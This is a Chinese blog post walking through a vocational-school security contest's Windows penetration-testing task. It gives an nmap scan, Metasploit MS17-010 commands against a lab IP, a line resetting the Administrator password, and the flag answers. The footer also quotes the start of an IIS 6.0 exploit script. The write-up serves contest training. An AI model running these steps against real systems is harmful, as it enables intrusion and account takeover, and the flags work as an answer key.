B-5:Windows操作系统渗透测试

最新推荐文章于 2023-06-02 23:51:18 发布
最新推荐文章于 2023-06-02 23:51:18 发布
阅读量535 收藏 1
点赞数 1
分类专栏: # 2022年宁波市中职组“网络安全”赛项 文章标签: 服务器 linux 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_45155797/article/details/130121574
版权

Server12

B-5:Windows操作系统渗透测试
任务环境说明:
	服务器场景名:Server2102(关闭连接)
	服务器场景操作系统:未知
1.	通过本地PC中渗透测试平台Kali对服务器场景进行系统服务及版本扫描渗透测试,并将该操作显示结果中8080端口对应的服务版本信息字符串作为Flag提交;
2.	通过本地PC中渗透测试平台Kali对服务器场景进行渗透测试,将该场景桌面上111文件夹唯一一个后缀为.docx文件的文件名称作为Flag提交;
3.	通过本地PC中渗透测试平台Kali对服务器场景进行渗透测试,将该场景桌面上111文件夹唯一一个后缀为.docx文件的内容作为Flag提交;
4.	通过本地PC中渗透测试平台Kali对服务器场景进行渗透测试,将该场景桌面上222文件夹中唯一一个图片的英文单词作为Flag提交;
5.	通过本地PC中渗透测试平台Kali对服务器场景进行渗透测试,将该场景回收站内文件的文档内容作为Flag提交;

1.通过本地PC中渗透测试平台Kali对服务器场景进行系统服务及版本扫描渗透测试,并将该操作显示结果中8080端口对应的服务版本信息字符串作为Flag提交;

nmap -sV -p- 192.168.14.200


Flag:Microsoft IIS httpd 6.0

2.通过本地PC中渗透测试平台Kali对服务器场景进行渗透测试,将该场景桌面上111文件夹唯一一个后缀为.docx文件的文件名称作为Flag提交;

search ms17-010
use 1
set rhosts 192.168.14.200
run
net user Administrator 111111


Flag:e7a70fa81a5935b7

3.通过本地PC中渗透测试平台Kali对服务器场景进行渗透测试,将该场景桌面上111文件夹唯一一个后缀为.docx文件的内容作为Flag提交;


Flag:7fc56270e7a70fa81a5935b72eacbe29

4.通过本地PC中渗透测试平台Kali对服务器场景进行渗透测试,将该场景桌面上222文件夹中唯一一个图片的英文单词作为Flag提交;


Flag:security

5.通过本地PC中渗透测试平台Kali对服务器场景进行渗透测试,将该场景回收站内文件的文档内容作为Flag提交;


Flag:92eb5ffee6ae2fec3ad71c777531578f

Wh1teSu
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
2021-08-27 网安实验-Windows系统渗透测试之IIS6.0远程代码执行0day漏洞
时光隧道
08-27 4万+
漏洞复现 此漏洞由于WebDAV服务的ScStoragePathFromUrl函数存在缓存区溢出漏洞攻击者可以构造恶意请求达到任意代码执行,所以IIS6.0需要开启WebDAV服务才可以成功利用 iis_exploit.py攻击脚本代码如下: import socket sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect(('127.0.0.1',80)) pay='PROPFIND / HTTP/1.1\r
渗透测试分类
weixin_58373549的博客
12-29 4038
渗透测试的分类 1,根据渗透测试方法分类: (1)黑盒测试:将测试对象看成一个黑盒子,完全不考虑测试对象的内部结构和内部特性。 (2)白盒测试:将测试对象看成一个打开的盒子,测试人员依据测试对象内部逻辑结构相关信息,设计或选择测试用例。 (3)灰盒测试:介于白盒和黑盒之间,是基于测试对象内部细节有限认知的软件测试方法。 2,根据渗透测试目标分类: (1)主机操作系统测试:对Windows,Solaris,AIX,Linux,SCO,SGI等操作系统本身进行渗透测试。 (2)数据库系统渗透:对M
Windows操作系统渗透测试
m0_65422235的博客
03-18 835
Windows操作系统渗透测试
中职网络空间安全Windows操作系统渗透测试解题
06-05
通过本地PC中渗透测试平台Kali对服务器场景PYsystem4进行渗透测试,将该场景中的当前最高账户管理员的密码作为FLAG提交 通过本地PC中渗透测试平台Kali对服务器场景PYsystem4进行渗透测试,将该场景中回收站内文件的文档内容作为FLAG提交。
中职组网络安全-windows渗透测试(解析+环境)
最新发布
m0_46056107的博客
06-02 467
5.通过本地PC中渗透测试平台Kali2.0对服务器场景Windows2020进行渗透测试,将该场景桌面上111文件夹中唯一一个后缀为.docx文件的文档内容作为Flag值提交;6.通过本地PC中渗透测试平台Kali2.0对服务器场景Windows2020进行渗透测试,将该场景桌面上222文件夹中唯一一个图片中的英文单词作为Flag值提交;3.通过本地PC中渗透测试平台Kali2.0对服务器场景Windows2020进行渗透测试,将该场景中的当前最高账户管理员的密码作为Flag值提交;
WEB渗透测试数据库
04-01
本项目用于提供渗透测试的辅助工具、资源文件 1.1 辅助工具 提供轻量级的易扩展的工具,可以快速编写exploit、添加漏洞验证/扫描规则、添加指纹规则、爆破规则等;包含以下功能: Exploit系统。易扩展的exploit...
大工18秋《计算机应用基础》在线测试123满分答案.docx
06-02
错 正确答案:B 常见的操作系统有UNIX、BASIC、Windows7。 T.对 F.错 正确答案:B 显示器和鼠标是输出设备。 T.对 F.错 正确答案:B word2010中,段落对齐的方式有右对齐、分散对齐、居中、两端对齐等。 T.对 F.错 正确...
java开源包5
06-28
jared是一个用来操作Windows注册表的 Java 类库,你可以用来对注册表信息进行读写。 GIF动画制作工具 GiftedMotion GiftedMotion是一个很小的,免费而且易于使用图像互换格式动画是能够设计一个有趣的动画了一系列...
java开源包1
06-28
jared是一个用来操作Windows注册表的 Java 类库,你可以用来对注册表信息进行读写。 GIF动画制作工具 GiftedMotion GiftedMotion是一个很小的,免费而且易于使用图像互换格式动画是能够设计一个有趣的动画了一系列...
java开源包4
06-28
jared是一个用来操作Windows注册表的 Java 类库,你可以用来对注册表信息进行读写。 GIF动画制作工具 GiftedMotion GiftedMotion是一个很小的,免费而且易于使用图像互换格式动画是能够设计一个有趣的动画了一系列...
windows渗透测试
Aluxian_的博客
05-25 9034
假设您是一名网络安全工程师,需要对某公司的公司进行黑盒测试,分析windows操作系统有什么漏洞并提出解决方案。 1.通过本地PC中渗透测试平台Kali2.0对服务器场景Windows2020进行系统服务及版本扫描渗透测试,并将该操作显示结果中8080端口对应的服务版本信息字符串作为Flag值提交; 使用nmap -sV -n 靶机IP flag:Microsoft IIS httpd 5.1 1.2. 通过本地PC中渗透测试平台Kali2.0对服务器场景Windows2020进行渗透测
网安赛题整理
武恩赐
02-13 1096
网安赛题整理
2023年中职组“网络空间安全”赛项XX市竞赛任务书
旺仔Sec&blog
05-06 1065
2023年中职组“网络空间安全”赛项 XX市竞赛任务书
2020web隐藏信息探索
weixin_68989528的博客
03-16 594
速度做完一套隐藏信息探索的CTF
2023年“楚怡杯“湖南省职业院校技能竞赛“网络安全”竞赛 B模块 Windows渗透与Linux提权
红叶的博客
03-15 1895
目录B-1:Windows操作系统渗透测试1. 通过本地PC中渗透测试平台Kali对服务器场景Windows进行系统服务及版本扫描渗透测试,并将该操作显示结果中Telnet服务对应的端口号作为FLAG提交2. 通过本地PC中渗透测试平台Kali对服务器场景Windows进行渗透测试,使用kali中hydra对服务器Telnet服务进行暴力破解(用户名为teltest),将hydra使用的必要参数当做FLAG进行提交(例:nmap -s -p 22);(字典路径/usr/share/wordlists/dir
中职网络空间安全B-windows渗透
qq_61988806的博客
03-06 639
中职网络空间安全Bwindows渗透
2023第二届浙江省技能大赛温州市选拔赛任务书
Aluxian_的博客
03-31 961
竞赛时间 共计3小时。任务环境说明: 服务器场景:Server2003(开放链接) 服务器场景操作系统Windows7 1.通过本地PC中渗透测试平台Kali对服务器场景Windows进行系统服务及版本扫描渗透测试,并将该操作显示结果中Telnet服务对应的端口号作为FLAG提交; 2.通过本地PC中渗透测试平台Kali对服务器场景Windows进行渗透测试,使用kali中hydra对服务器Telnet服务进行暴力破解(用户名为teltest),将hydra使用的必要参数当做FLAG进行提交(例:nm
B-9:Linux操作系统渗透测
m0_45155797的博客
04-13 915
B-9:Linux操作系统渗透测 任务环境说明:  服务器场景:Server2130  服务器场景操作系统Linux(关闭链接) 1.通过本地PC中渗透测试平台Kali对靶机场景进行系统服务及版本扫描渗透测试,并将该操作显示结果中Apache服务对应的版本信息字符串作为Flag值提交; 2.通过本地PC中渗透测试平台Kali对靶机场景进行渗透测试,将该场景/var/www/html目录中waf防火墙文件中的所有的被过滤的字符串内容作为Flag值提交;(如:"-","$","^","&",......)
2020年全国职业院校技能大赛改革试点赛(中职组)
5L2g556F5ZWl77yf
10-17 5637
为赛卷一,环境都是自己做的,仅作参考 网络安全竞赛试题 (一)(总分100分) 赛题说明 一、竞赛项目简介 “网络安全”竞赛共分A. 基础设施设置与安全加固;B. 网络安全事件响应、数字取证调查和应用安全;C. CTF夺旗-攻击;D. CTF夺旗-防御等四个模块。根据比赛实际情况,竞赛赛场实际使用赛题参数、表述及环境可能有适当修改,具体情况以实际比赛发放赛题为准。竞赛时间安排和分值权重见表1。 表1 竞赛时间安排与分值权重 模块编号 模块名称 竞赛时间 (小时) 权值 A 基础设施设置与安全加固 3

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Wh1teSu

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值